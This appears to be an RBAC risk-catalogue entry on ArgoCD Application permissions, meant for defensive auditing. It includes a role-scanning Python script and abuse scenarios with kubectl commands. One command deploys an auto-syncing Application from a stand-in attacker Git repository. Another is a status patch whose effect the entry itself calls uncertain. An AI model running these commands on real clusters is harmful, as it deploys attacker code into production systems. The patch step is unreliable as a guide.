Manage ArgoCD Applications (argoproj.io)
Tampering
Critical
Overview
Field | Value |
---|---|
ID | 1063 |
Name | Manage ArgoCD Applications (argoproj.io) |
Risk Category | Tampering |
Risk Level | Critical |
Role Type | Role |
API Groups | argoproj.io |
Resources | applications |
Verbs | create, update, patch, delete, sync |
Tags | CodeExecution PotentialPrivilegeEscalation Tampering WorkloadDeployment |
Description
Grants permission to manage ArgoCD Application resources. This allows deploying, modifying, or deleting applications managed by ArgoCD, potentially leading to the deployment of malicious workloads, unauthorized code execution, tampering with production systems, and privilege escalation if ArgoCD has high privileges.
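To find where this rule applies in a cluster, the following added example (not part of the original rule entry) checks Role objects for the API group, resource and verbs listed in the Overview table, treating `*` as a match. The role names and the embedded JSON are constructed sample data shaped like `kubectl get roles -A -o json` output.

```python
import json

# Values taken from the Overview table of rule 1063.
API_GROUP = "argoproj.io"
RESOURCE = "applications"
RISKY_VERBS = {"create", "update", "patch", "delete", "sync"}

# Constructed sample (hypothetical roles), shaped like `kubectl get roles -A -o json`.
SAMPLE = json.loads("""
{"items": [
 {"kind": "Role", "metadata": {"name": "cd-operator", "namespace": "argocd"},
  "rules": [{"apiGroups": ["argoproj.io"], "resources": ["applications"], "verbs": ["get", "patch", "sync"]}]},
 {"kind": "Role", "metadata": {"name": "app-viewer", "namespace": "argocd"},
  "rules": [{"apiGroups": ["argoproj.io"], "resources": ["applications"], "verbs": ["get", "list", "watch"]}]},
 {"kind": "Role", "metadata": {"name": "ns-admin", "namespace": "team-a"},
  "rules": [{"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]}]},
 {"kind": "Role", "metadata": {"name": "deployer", "namespace": "team-a"},
  "rules": [{"apiGroups": ["apps"], "resources": ["deployments"], "verbs": ["create", "patch"]}]}
]}
""")

def _covers(values, wanted):
    """True if an RBAC rule list names `wanted` directly or through the '*' wildcard."""
    return "*" in values or wanted in values

def risky_verbs(rule):
    """Return the rule-1063 verbs that a single RBAC rule grants on Applications."""
    if not (_covers(rule.get("apiGroups", []), API_GROUP)
            and _covers(rule.get("resources", []), RESOURCE)):
        return set()
    verbs = set(rule.get("verbs", []))
    return set(RISKY_VERBS) if "*" in verbs else verbs & RISKY_VERBS

def find_matches(role_list):
    """Map 'namespace/name' to the sorted risky verbs of every matching Role."""
    hits = {}
    for role in role_list.get("items", []):
        granted = set()
        for rule in role.get("rules") or []:  # "rules" may be null on an empty Role
            granted |= risky_verbs(rule)
        if granted:
            meta = role["metadata"]
            hits[f'{meta.get("namespace", "")}/{meta["name"]}'] = sorted(granted)
    return hits

if __name__ == "__main__":
    for name, verbs in find_matches(SAMPLE).items():
        print(f"{name}: {', '.join(verbs)}")
```

Each role reported here still has to be traced to its RoleBindings to see which subjects actually hold the permission.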
Abuse Scenarios
- Create a new ArgoCD Application pointing to a malicious Git repository.
  ```bash
  kubectl create -n <namespace> -f - <<EOF
  apiVersion: argoproj.io/v1alpha1
  kind: Application
  metadata:
    name: malicious-app
  spec:
    destination:
      namespace: <target-namespace>
      server: https://kubernetes.default.svc
    project: default
    source:
      repoURL: https://github.com/attacker/malicious-manifests.git
      targetRevision: HEAD
      path: .
    syncPolicy:
      automated:
        prune: true
        selfHeal: true
  EOF
  # Example: kubectl create -n argocd -f - <<EOF ... EOF
  ```
- Force synchronization of an ArgoCD Application to deploy changes immediately.
  ```bash
  kubectl patch application <application-name> -n <namespace> --type='merge' -p='{"status": {"operationState": {"phase": "Running", "syncResult": {"resources": []}}}}'
  # Note: Direct 'sync' verb via kubectl is not standard. This patch might trigger a sync.
  # A more direct way is using the ArgoCD CLI: `argocd app sync <application-name> -n <namespace>`
  # Example: kubectl patch application my-app -n argocd --type='merge' -p='{"status": {"operationState": {"phase": "Running", "syncResult": {"resources": []}}}}'
  ```